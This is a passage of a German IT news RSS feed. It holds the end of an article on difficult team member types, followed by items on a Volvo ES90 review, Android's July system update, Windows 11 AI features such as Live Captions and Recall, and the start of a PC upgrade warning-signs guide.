					Foto: PointImages – shutterstock.com</p></div><p class="foundryImageDescription">Speziell in Situationen, in denen immenser Druck herrscht, neigen manche Mitarbeiter dazu, alle möglichen, absurden Versprechungen zu machen. Entweder um Aufmerksamkeit zu erringen oder um dem Vorgesetzten beziehungsweise dem Management zu gefallen. Versprechungen machen ist immer einfach, aber wenn das Mega-Projekt dann eben nicht in den versprochenen zweieinhalb Wochen abgeschlossen ist, ist das ungünstig. <br><br> Alexander Maasik empfiehlt: “Wenn es ein Teammitglied gibt, das am laufenden Band falsche Versprechungen gibt, von denen bereits vorher klar ist, dass sie unmöglich einzuhalten sind, sollten Sie seine Worte nicht mehr für bare Münze nehmen. Wenn Sie können, verlängern Sie den Zeitrahmen und/oder erhöhen Sie Budget oder Ressourceneinsatz, um Engpässe in anderen Bereichen kompensieren zu können.” </p><div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Verantwortungsschieber" title="Der Verantwortungsschieber" src="https://images.computerwoche.de/bdb/2677938/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Verantwortungsschieber</p></figcaption></figure><p class="imageCredit">
					Foto: Africa Studio – shutterstock.com</p></div><p class="foundryImageDescription">Dann gibt es diese Kollegen, die das Collaboration-Prinzip der geteilten Verantwortung auf ihre ganz eigene Weise interpretieren. Getreu dem Motto: “Die anderen werden es schon richten.” Experte Maasik rät in einem solchen Fall dazu, dem betreffenden Mitarbeiter eine definierte Rolle und spezifizierte Verantwortlichkeiten im Team zuzuweisen. Alternativ könnten Sie den Verantwortungsschieber auch fragen, ob es Bereiche gibt, die ihn besonders interessieren. Eventuell könnten Sie so seine Leistungs-Leidenschaft neu entflammen. <br><br> “Manchmal können Sie solche Leute motivieren, indem Sie ihnen Führungsverantwortung übertragen oder ihnen die Verantwortung für ein bestimmtes Gebiet/Thema übertragen, das ihnen am Herzen liegt. Sollte betreffender Kollege allerdings für ausschweifende Arbeitsunlust bekannt sein, hilft unglücklicherweise nur, ihn (oder sie) im Auge zu behalten und sich wenn nötig an höhere Instanzen zu wenden.”</p><div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Fremdfeder-Connoisseur" title="Der Fremdfeder-Connoisseur" src="https://images.computerwoche.de/bdb/2677939/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Fremdfeder-Connoisseur</p></figcaption></figure><p class="imageCredit">
					Foto: pathdoc – shutterstock.com</p></div><p class="foundryImageDescription">Es ist nur menschlich, nach Wertschätzung und Anerkennung zu streben. Aber einige Menschen übertreiben das in einem Ausmaß, dass sie fast schon selbst daran glauben, wenn sie sich fälschlicherweise die Erfolge anderer zuschreiben.  <br><br> Maasik: “Leider nimmt der Enthusiasmus dieser Leute rasant ab, wenn es darum geht, die Verantwortung für Misserfolge zu übernehmen. Um solchen Entwicklungen entgegenzuwirken, empfiehlt es sich, genau festzuhalten, wer für welchen Part der Projektarbeit zuständig ist. So können auch alle Beteiligten sehen, wer welchen Beitrag leistet. Sollte jemand auf das Einheimsen von Lorbeeren bestehen, stellen Sie sicher, dass derjenige auch im Fall des Misserfolgs sein Fett abbekommt.”</p><div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Makel-Magnat" title="Der Makel-Magnat" src="https://images.computerwoche.de/bdb/2677937/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Makel-Magnat</p></figcaption></figure><p class="imageCredit">
					Foto: Photographee.eu – shutterstock.com</p></div><p class="foundryImageDescription">Nicht führt die Team-Moral schneller und geradliniger in den Abgrund, als einer, der ständig nur kritisiert, auf Fehler “hinweist” oder sich über jeden Aspekt eines Projekts nur beschwert. Egal, ob es um Zuständigkeiten, Workloads oder die Strategie geht, der Makel-Magnat hat einfach immer was zu meckern. <br><br> “Dieses Verhalten ist absolutes Gift für das Teamwork. Diese Leute verbringen mehr Zeit damit, sich zu beschweren, als mit der Erfüllung ihrer Aufgaben. Der beste Weg solche Menschen zu handlen: 1. Ignorieren Sie das Gemecker, 2. Geben Sie ihm so viel Verantwortung, dass er (oder sie) keine Zeit mehr hat rumzujammern.”</p><div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Aussteiger" title="Der Aussteiger" src="https://images.computerwoche.de/bdb/2677940/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Aussteiger</p></figcaption></figure><p class="imageCredit">
					Foto: YuriyZhuravov – shutterstock.com</p></div><p class="foundryImageDescription">Manche Leute arbeiten besser alleine. Ist auch gar kein Problem. Außer es handelt sich um Personen, die in Team-Projekte eingebunden sind. Dann könnte jemand, der Anweisungen aus Prinzip ignoriert und affin für Alleingänge ist, das ganze Projekt auf’s Spiel setzen.  <br><br> Deswegen empfiehlt auch Alexander Maasik, solche Leute lieber aufs “Abstellgleis” zu befördern: “Finden Sie einen Bereich im Projekt, an dem ein solcher Mitarbeiter alleine arbeiten oder sich selbst verwirklichen kann. So holen Sie das Maximum an Produktivität aus diesem Kollegen heraus und stellen gleichzeitig sicher, dass der Rest des Teams intakt bleibt.”</p></div>

</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Volvo ES90 im Test: Das „Flaggschiff“, was aber gar keins ist]]></title>
<description><![CDATA[Volvo ist für SUVs bekannt und fokussiert sich mittlerweile voll und ganz auf diese Sparte. Aber man will kein reiner SUV-Hersteller werden, daher gibt es hier und da noch andere …]]></description>
<link>https://tsecurity.de/de/3663543/it-nachrichten/volvo-es90-im-test-das-flaggschiff-was-aber-gar-keins-ist/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663543/it-nachrichten/volvo-es90-im-test-das-flaggschiff-was-aber-gar-keins-ist/</guid>
<pubDate>Sun, 12 Jul 2026 18:04:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="1100" src="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/volvo-es90-seite.jpg?fit=1600%2C1100&amp;ssl=1" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/volvo-es90-seite.jpg?w=1600&amp;ssl=1 1600w, https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/volvo-es90-seite.jpg?resize=690%2C474&amp;ssl=1 690w" sizes="(max-width: 1600px) 100vw, 1600px">
Volvo ist für SUVs bekannt und fokussiert sich mittlerweile voll und ganz auf diese Sparte. Aber man will kein reiner SUV-Hersteller werden, daher gibt es hier und da noch andere …]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese neuen Funktionen bekommen Android-Nutzer im Juli]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3662881/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662881/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</guid>
<pubDate>Sun, 12 Jul 2026 08:47:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese Windows-11-KI-Funktionen brauchen Sie wirklich]]></title>
<description><![CDATA[Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung läuft auf passender Hardware, und Recall durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.



Microsoft verteilt...]]></description>
<link>https://tsecurity.de/de/3662871/it-nachrichten/diese-windows-11-ki-funktionen-brauchen-sie-wirklich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662871/it-nachrichten/diese-windows-11-ki-funktionen-brauchen-sie-wirklich/</guid>
<pubDate>Sun, 12 Jul 2026 08:32:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung <a href="https://www.pcwelt.de/article/3141725/snapdragon-x2-elite-ki-notebook-rechenleistung.html" target="_blank" rel="noreferrer noopener">läuft auf passender Hardware</a>, und <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Recall</a> durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.</p>



<p>Microsoft verteilt die KI-Funktionen schrittweise und nach Hardware gestaffelt. Ältere Rechner erhalten die Grundfunktionen, neuere Geräte mit eigener KI-Einheit bekommen mehr. Nicht jedes System zeigt sofort alle Optionen, und mit jedem größeren Update kommt Weiteres hinzu. Mehrere Funktionen helfen schon heute im täglichen Einsatz, ohne dass Sie Zusatzsoftware installieren müssen. Die <a href="https://support.microsoft.com/de-de/accessibility/windows/use-live-captions-to-better-understand-audio">offizielle Anleitung zu den Live-Untertiteln stellt Microsoft auf seinen Support-Seiten bereit</a>.</p>



<h2 class="wp-block-heading toc">Live-Untertitel verwandeln jeden Ton in Text</h2>



<p>Die Funktion fängt das Audiosignal Ihres Rechners ab, erkennt gesprochene Sprache und blendet sie als Text ein. Das funktioniert unabhängig von der App. Ob YouTube im Browser, eine Mediathek, ein Podcast, ein Hörbuch oder die Stimme des Gegenübers in einer Videokonferenz – der Text läuft mit. Der Rechner verarbeitet alles vor Ort. Nach dem einmaligen Download der Sprachdateien benötigen Sie keine Internetverbindung mehr, und nichts davon wandert in die Cloud.</p>



<p>Zum Einschalten genügt die Tastenkombination <em>Windows + Strg + L</em>. Alternativ klicken Sie sich über “<em>Einstellungen” -&gt; “Barrierefreiheit” -&gt; “Untertitel</em>” durch und stellen die Live-Untertitel auf Ein. Beim ersten Start lädt Windows die passenden Sprachpakete herunter, ein Vorgang von wenigen Sekunden. Deutsch steht für die reinen Untertitel zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5334c69adf3"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ki-funktionen-01.png?w=1200" alt="Live-Untertitel in Windows 11" class="wp-image-3178657" width="1200" height="863" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Über das Zahnrad im Untertitelfenster passen Sie Position, Schriftgröße und Farbe an. Sie verschieben den Textbereich an den oberen oder unteren Rand oder lassen ihn frei schweben. Auf Wunsch bezieht die Funktion auch das Mikrofon ein und verschriftlicht Ihre eigene Stimme, praktisch bei Diktaten oder Gesprächen vor Ort.</p>



<p>Ein Filter blendet Schimpfwörter aus. Mehrere Grenzen sollten Sie kennen. Das System erkennt nur menschliche Sprache, Liedtexte und Geräusche bleiben außen vor. Treffen Mikrofon- und Computerton zusammen, hat die Tonausgabe des Rechners Vorrang.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Die Übersetzung hängt an der Hardware</h2>



<p>Die Untertitel kann Windows auch übersetzen, doch dafür gelten engere Voraussetzungen. Nötig ist ein Copilot+ PC mit eigener KI-Einheit und mindestens Windows 11 in der Version 24H2. Auf solchen Geräten überträgt das System gesprochene Inhalte aus über 40 Sprachen ins Englische und aus 27 Sprachen ins vereinfachte Chinesisch, in Echtzeit und ohne Cloud.</p>



<p>Der praktische Nutzen hat enge Grenzen. Die Zielsprache lautet Englisch oder vereinfachtes Chinesisch. Ein fremdsprachiges Video holt das System ins Englische. Für eine deutsche Ausgabe greifen Sie zu anderen Mitteln, darunter die eigenen Untertitelfunktionen von YouTube oder Netflix oder eine Übersetzung im Browser. Auf Rechnern ohne Copilot+ Technik bleiben die Standarduntertitel verfügbar, die Übersetzung erfordert die neuere Hardware.</p>



<p>Microsoft hat auf der Entwicklerkonferenz Build 2026 angekündigt, die lokale Spracherkennung und Funktionen wie die Live-Untertitel künftig auch auf normalen Prozessoren und Grafikkarten laufen zu lassen. Die Bindung an spezielle KI-Chips lockert sich damit, Microsoft verteilt die Neuerungen schrittweise über kommende Updates. Wann genau welche Sprache und welches Gerät an der Reihe ist, hat Microsoft offengelassen.</p>



<h2 class="wp-block-heading toc">Recall durchsucht alte Bildschirminhalte</h2>



<p>Recall fertigt im Abstand weniger Sekunden Momentaufnahmen Ihres Bildschirms an, speichert sie verschlüsselt auf der Festplatte und macht sie durchsuchbar. Sie beschreiben mit eigenen Worten, was Sie gesehen haben, und das System liefert die passende Stelle zurück. Eine Webseite, ein Dokument oder eine App-Ansicht von gestern findet sich so wieder, auch ohne Dateinamen oder Verlauf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5334c69bc22"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/windows_recall_6.jpg?quality=50&amp;strip=all" alt="Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar." class="wp-image-2976485" width="934" height="582" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Der Vorteil zeigt sich bei häufiger Rücksuche. Suchen Sie oft nach früher gesehenen Inhalten, sparen Sie sich das mühsame Durchklicken von Ordnern und Browserverlauf. Bei seltener Nutzung bleibt der Gewinn gering, die offenen Datenschutzfragen bestehen weiter. Recall hält fest, was auf dem Schirm erscheint, darunter private Nachrichten, Bankdaten oder Gesundheitsinformationen. Ein Filter für sensible Inhalte greift, arbeitet aber nicht lückenlos. Deshalb sperren einzelne Programme, darunter Signal und der Brave-Browser, ihre Inhalte gegen die Aufnahme.</p>



<p>Mehrere Hürden schützen Sie vorab. Recall läuft nur auf Copilot+ PCs, setzt die Anmeldung über Windows Hello voraus und bleibt nach der Einrichtung ausgeschaltet. Erst Ihre bewusste Zustimmung startet die Aufnahmen. Pro Quartal beanspruchen die Momentaufnahmen bis zu 25 Gigabyte Speicher. Einzelne Apps und Webseiten können ausgeschlossen werden, Aufnahmen pausieren oder löschen.</p>



<p>Zum Abschalten öffnen Sie “Einstellungen” -&gt; “Datenschutz und Sicherheit” -&gt; “Recall und Snapshots” und stellen die Option zum Speichern der Aufnahmen auf Aus. Vorhandene Aufnahmen entfernen Sie an gleicher Stelle. <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Eine ausführliche Schritt-für-Schritt-Anleitung zum Deaktivieren und zum Löschen der Screenshots steht bereit</a>. </p>



<p>Zur Prüfung per Programm steht das kostenlose <a href="https://www.dpbolvw.net/click-3275038-13645854?sid=rss&amp;url=https://www.ashampoo.com/de-de/stop-recall" target="_blank" rel="noreferrer noopener">Stop Recall von Ashampoo</a> bereit. Das Tool kontrolliert den zuständigen Registry-Wert und schaltet die Funktion per Klick ab. Hilfreich ist das auch nach Updates, denn ein Update kann die Einstellung zurücksetzen. <a href="https://support.microsoft.com/de-DE/Windows/Ai/Ai-Features/retrace-your-steps-with-recall" target="_blank" rel="noreferrer noopener">Microsoft beschreibt die Funktion</a> und ihre Kontrollmöglichkeiten ebenfalls im eigenen Support.</p>



<h2 class="wp-block-heading toc">Editor und Copilot erledigen kleine Aufgaben</h2>



<p>Auch der schlichte Editor von Windows kann inzwischen KI-Funktionen nutzen. Die Schreibtools aktivieren Sie über das Zahnrad oben rechts, indem Sie in den Einstellungen ganz nach unten scrollen und die entsprechende Option einschalten. Anschließend markieren Sie einen Text, klicken mit der rechten Maustaste und lassen ihn zusammenfassen oder mithilfe vorgegebener Optionen umformulieren. Wenn Ihnen die Funktion nicht gefällt, können Sie sie an gleicher Stelle jederzeit wieder deaktivieren.</p>



<p>Der Copilot-Assistent beantwortet Fragen, formuliert Texte um und steuert auf Zuruf sogar Systemeinstellungen wie Bluetooth, die Bildschirmhelligkeit oder den Dunkelmodus. Starten lässt er sich über die Copilot-Taste auf neueren Tastaturen oder per Tastenkombination <strong>Windows + C</strong>. Viele Funktionen laufen dabei über die Cloud und erfordern ein Microsoft-Konto. Eine neue Suchfunktion namens „Ask Copilot“ soll mittelfristig die klassische Windows-Suche in der Taskleiste ersetzen, bleibt jedoch optional und wird nicht automatisch aktiviert.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Warnsignale, dass Ihr PC ein Upgrade braucht und welche Fehler Sie unnötig Geld kosten]]></title>
<description><![CDATA[Ein neuer PC ist selten ein spontaner Kauf: Meistens versucht man, den betagten Rechner so lange wie möglich weiter zu nutzen. Mit Blick auf die Umwelt und den Geldbeutel ergibt das durchaus Sinn.



Doch eines Tages häufen sich die Probleme: Windows-Updates bleiben aus, Programme starten quälend...]]></description>
<link>https://tsecurity.de/de/3662853/windows-tipps/5-warnsignale-dass-ihr-pc-ein-upgrade-braucht-und-welche-fehler-sie-unnoetig-geld-kosten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662853/windows-tipps/5-warnsignale-dass-ihr-pc-ein-upgrade-braucht-und-welche-fehler-sie-unnoetig-geld-kosten/</guid>
<pubDate>Sun, 12 Jul 2026 08:10:05 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neuer PC ist selten ein spontaner Kauf: Meistens versucht man, den betagten Rechner so lange wie möglich weiter zu nutzen. Mit Blick auf die Umwelt und den Geldbeutel ergibt das durchaus Sinn.</p>



<p>Doch eines Tages häufen sich die Probleme: Windows-Updates bleiben aus, Programme starten quälend langsam, oder die Festplatte ist permanent voll. Spätestens wenn der Rechner im Alltag nur noch nervt oder gar nicht mehr mit aktueller Hardware Schritt halten kann, wird es Zeit für etwas Neues. Diese fünf klaren Warnsignale verraten Ihnen, wann es so weit ist.</p>



<p><strong>Tipp:</strong> Falls es Zeit für ein Upgrade ist, stellen wir Ihnen am Ende des Artikels drei starke PCs vor. Einen leistungsstarken Gaming-PC, eine günstige Office-Maschine und eine solide Multimedia-Station fürs mittlere Budget.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 1: Kaum noch Software-Updates </h2>



<p>Regelmäßige Updates sind entscheidend, damit Ihr PC sicher und funktionsfähig bleibt. Wenn Windows oder andere wichtige Programme keine Updates mehr bekommen, ist das ein klares Warnsignal. Besonders kritisch wird es, wenn das Betriebssystem selbst nicht mehr unterstützt wird – <a href="https://www.pcwelt.de/article/2915366/windows-10-nutzer-aufgepasst-das-muessen-sie-jetzt-unbedingt-tun.html" target="_blank" rel="noreferrer noopener">wie zuletzt bei Windows 10</a>, das seit Oktober 2025 nur noch eingeschränkt <a href="https://www.pcwelt.de/article/2921217/windows-10-support-fuer-eu-nutzer-gratis-es-gibt-aber-diesen-haken.html" target="_blank" rel="noreferrer noopener">Sicherheits-Updates</a> <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">für 24 Monate erhält.</a></p>



<p>Ohne solche Updates fehlen bald wichtige Sicherheits-Patches. Das macht einen PC anfällig für Viren, Malware und andere Angriffe aus dem Netz. Zudem laufen viele neue Programme irgendwann nur noch auf aktuellen Windows-Versionen. Altrechner bleiben dann auch softwareseitig auf der Strecke.</p>



<p><strong>Tipp:</strong> Prüfen Sie in den Windows-Einstellungen regelmäßig, ob neue Updates verfügbar sind. Wenn Ihr System dauerhaft meldet, es sei „auf dem neuesten Stand“, obwohl bereits eine neuere Windows-Version existiert, dann wird es höchste Zeit, über einen neuen PC nachzudenken.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 2: PC schnell heiß und laut</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a532fa96944d"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/HWMonitor-Screenshot.png" alt="HWMonitor Screenshot" class="wp-image-2901499" width="961" height="976" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Temperaturprobleme können Sie zum Beispiel mit dem kostenlosen <a href="https://www.pcwelt.de/article/1164870/hwmonitor-2.html" target="_blank" rel="noreferrer noopener">HWMonitor</a> aufspüren.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Ein gesundes System sollte auch unter Last einigermaßen leise bleiben. Wenn Ihr PC aber schon bei einfachen Aufgaben heißläuft und die Lüfter im Dauerbetrieb laut werden, deutet das auf veraltete oder überlastete Hardware hin. Neben der nervigen Geräuschkulisse riskieren Sie auch, dass Bauteile durch Überhitzung Schaden nehmen oder der PC in einem kritischen Moment den Dienst quittiert. Im schlimmsten Fall gehen dann wichtige Daten verloren.</p>



<p><strong>Tipp:</strong> Reinigen Sie Ihren PC zunächst von Staub und prüfen Sie die Temperatur mit Tools wie <a href="https://www.pcwelt.de/article/1164870/hwmonitor-2.html" target="_blank" rel="noreferrer noopener">HWMonitor</a>. Bleiben die Probleme trotz Wartung bestehen, ist ein Neukauf oft sinnvoller, als Kühlung oder Bauteile nachzurüsten, während man auf veralteten Komponenten sitzen bleibt.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 3: Kaum noch Speicherplatz frei</h2>



